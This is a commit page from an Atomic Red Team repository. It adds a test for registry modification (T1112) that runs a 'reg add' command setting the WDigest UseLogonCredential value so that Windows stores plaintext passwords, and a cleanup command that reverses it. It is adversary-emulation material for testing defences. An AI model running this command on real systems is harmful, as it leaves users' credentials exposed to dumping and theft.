security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added new atomic, 'Modify registry for password downgrade to plain text' (#566)

Browse Source 
* Added new atomic, 'Modify registry for password downgrade to plain text'

* fixed syntax on executor
This commit is contained in:
JB
2019-09-17 09:44:55 -05:00
committed by Michael Haag
parent ac5fb215d5
commit 8b855a5139
1 changed files with 13 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1112/T1112.yaml
+13
View File
@@ -87,3 +87,16 @@ atomic_tests:
### Garbage collection and closing of ntuser.dat ###
[gc]::Collect()
reg unload "HKU\$($ProfileList[$p].SID)"
- name: Modify registry for password downgrade to plain text
description: |
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
cleanup_command: |
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f